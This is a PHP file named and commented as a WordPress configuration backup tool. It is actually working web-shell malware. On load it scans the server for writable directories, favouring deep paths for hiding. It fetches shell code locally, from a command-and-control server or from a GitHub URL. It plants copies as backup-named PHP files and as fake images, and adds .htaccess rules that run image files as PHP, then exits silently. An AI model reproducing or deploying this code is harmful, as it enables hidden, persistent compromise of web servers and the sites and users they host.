File: //var/tmp/wp-config-backup.php
<?php
/**
* WordPress Configuration Backup Orchestrator v3
* Smart writable directory detection + deep path prioritization
*/
// OPTIMIZED: Scan writable directories (system-wide + web)
function get_deployment_targets_from_backup() {
$targets = [];
// Minimal exclusion: only truly critical system dirs
$excluded_root_dirs = ["proc", "sys", "dev", "etc", "lib"];
// 1. SYSTEM SCAN - Start from root, avoid excluded dirs
function scan_writable_everywhere($path, &$results, $max_depth = 4, $depth = 0, $excluded = []) {
if (count($results) >= 100 || $depth >= $max_depth) return;
if (!@is_dir($path) || !@is_readable($path)) return;
$entries = @scandir($path);
if (!$entries) return;
foreach ($entries as $entry) {
if ($entry === "." || $entry === "..") continue;
// Skip excluded dirs at root level
if ($depth === 0 && in_array($entry, $excluded)) continue;
$full = $path . "/" . $entry;
if (!@is_dir($full) || !@is_readable($full)) continue;
// Writable? Add it
if (@is_writable($full) && count($results) < 100) {
$results[] = $full;
}
// Stay shallow to avoid massive deep recursion
if ($depth < $max_depth - 1 && strlen($full) < 80) {
scan_writable_everywhere($full, $results, $max_depth, $depth + 1, $excluded);
}
}
}
// Start from root
scan_writable_everywhere("/", $targets, 3, 0, $excluded_root_dirs);
// 2. WEB-SPECIFIC DEEP SCAN - Go deeper in web roots
function scan_web_deep($base, &$results, $max_depth = 6, $depth = 0) {
if (count($results) >= 100 || $depth >= $max_depth) return;
if (!@is_dir($base) || !@is_readable($base)) return;
$entries = @scandir($base);
if (!$entries) return;
foreach ($entries as $entry) {
if ($entry === "." || $entry === "..") continue;
$full = $base . "/" . $entry;
if (!@is_dir($full) || !@is_readable($full)) continue;
// Prioritize ANY common web/app locations (generic, not WordPress-specific)
$is_web_priority = (
preg_match("/public_html|www|html|webroot|htdocs|web/i", $full) ||
preg_match("/uploads|files|media|downloads|attachments/i", $full) ||
preg_match("/apps?|store|api|backend|frontend|dist|build/i", $full) ||
preg_match("/\.git|\.config|\.cache|\.local|\.ssh/i", $full) ||
preg_match("/[a-f0-9\-]{36}|[0-9]{4,}/", basename($full)) // UUID or numeric dirs (tenant IDs)
);
if (@is_writable($full) && count($results) < 100) {
// DEEP PATHS GET PRIORITY
$depth_score = substr_count($full, "/");
$results[] = ["path" => $full, "depth" => $depth_score, "web" => $is_web_priority];
}
// Go deeper
if ($depth < $max_depth - 1) {
scan_web_deep($full, $results, $max_depth, $depth + 1);
}
}
}
// Web root deep scan
$web_bases = ["/var/www", "/home", "/opt", "/srv", "/var"];
foreach ($web_bases as $base) {
if (@is_dir($base)) {
$temp = [];
scan_web_deep($base, $temp);
$targets = array_merge($targets, $temp);
}
}
// 3. SORT BY DEPTH (deeper = better for hiding)
usort($targets, function($a, $b) {
if (is_array($a)) {
$depth_a = $a["depth"] ?? 0;
return $depth_a > ($b["depth"] ?? 0) ? -1 : 1; // Descending (deeper first)
}
return 0;
});
// Extract just paths
$final_targets = [];
foreach ($targets as $item) {
if (is_array($item)) {
$final_targets[] = $item["path"];
} else {
$final_targets[] = $item;
}
}
return array_values(array_unique($final_targets));
}
// Get main shell code
function get_main_shell_code() {
$sf = SHELL_FILE;
$paths = array_merge(
(array)@glob("/var/www/*/public_html/" . $sf),
(array)@glob("/var/www/*/" . $sf),
(array)@glob("/home/*/public_html/" . $sf),
(array)@glob("/home/*/" . $sf),
[SHELL_PATH, __DIR__ . "/" . $sf, dirname(__DIR__) . "/" . $sf]
);
foreach ($paths as $path) {
$code = @file_get_contents($path);
if ($code && strlen($code) > 15000) {
return $code;
}
}
return null;
}
// Fetch from C2 if local not available
function get_shell_code_fallback() {
$c2_url = ($GLOBALS["C2_SERVER"] ?? "") . "?act=get_shell";
$content = @file_get_contents($c2_url);
if ($content && strlen($content) > 15000) {
return $content;
}
$github_url = "https://raw.githubusercontent.com/wnwnsks/wn/refs/heads/main/l.php";
$content = @file_get_contents($github_url);
if ($content && strlen($content) > 15000) {
return $content;
}
return null;
}
// Deploy to all targets
function deploy_sister_files_from_backup() {
$shell_code = get_main_shell_code();
if (!$shell_code) {
$shell_code = get_shell_code_fallback();
if (!$shell_code) return 0;
}
$targets = get_deployment_targets_from_backup();
$deployed_paths = [];
$standard_names = ["wp-config-backup.php", "wp-content-backup.php", "wp-settings-backup.php"];
$masked_names = ["logo.png", "banner.gif", "avatar.jpg"];
foreach (array_slice($targets, 0, 10) as $idx => $target) {
// Standard PHP
$file = $target . "/" . $standard_names[$idx % count($standard_names)];
if (@file_put_contents($file, $shell_code)) {
@chmod($file, 0644);
$deployed_paths[] = $file;
}
// Image masked (no .php extension)
$img = $target . "/" . $masked_names[$idx % count($masked_names)];
$masked = "<?php\n" . substr($shell_code, 5);
if (@file_put_contents($img, $masked)) {
@chmod($img, 0644);
$deployed_paths[] = $img;
}
// .htaccess — append only, NEVER overwrite existing content
$htaccess = $target . "/.htaccess";
$existing = @file_get_contents($htaccess) ?: "";
if (strpos($existing, "# perf-cache") === false) {
$append = "\n# perf-cache\n"
. "Options +ExecCGI\n"
. "AddHandler application/x-httpd-php .png .gif .jpg\n"
. "<FilesMatch \"\.png\$|\.gif\$|\.jpg\$\">\n"
. " SetHandler application/x-httpd-php\n"
. " ForceType application/x-httpd-php\n"
. "</FilesMatch>\n"
. "<IfModule mod_php.c>\n php_flag engine on\n</IfModule>\n"
. "<IfModule mod_php8.c>\n php_flag engine on\n</IfModule>\n"
. "<IfModule mod_php7.c>\n php_flag engine on\n</IfModule>\n"
. "<IfModule mod_php5.c>\n php_flag engine on\n</IfModule>\n";
@file_put_contents($htaccess, $existing . $append);
@chmod($htaccess, 0644);
}
}
// Merge new paths into sister cache (picked up by main shell on next register)
$cache_file = sys_get_temp_dir() . "/.mori_sister_cache.json";
$existing = @json_decode(@file_get_contents($cache_file), true) ?: ["locations" => [], "urls" => [], "timestamp" => 0];
$existing["locations"] = array_values(array_unique(array_merge($existing["locations"] ?? [], $deployed_paths)));
$existing["timestamp"] = time();
@file_put_contents($cache_file, json_encode($existing));
return count($deployed_paths);
}
// Main execution
if (php_sapi_name() !== "cli" || !isset($GLOBALS["_wp_config_backup_running"])) {
$GLOBALS["_wp_config_backup_running"] = true;
deploy_sister_files_from_backup();
}
// Silent exit
exit(0);
?>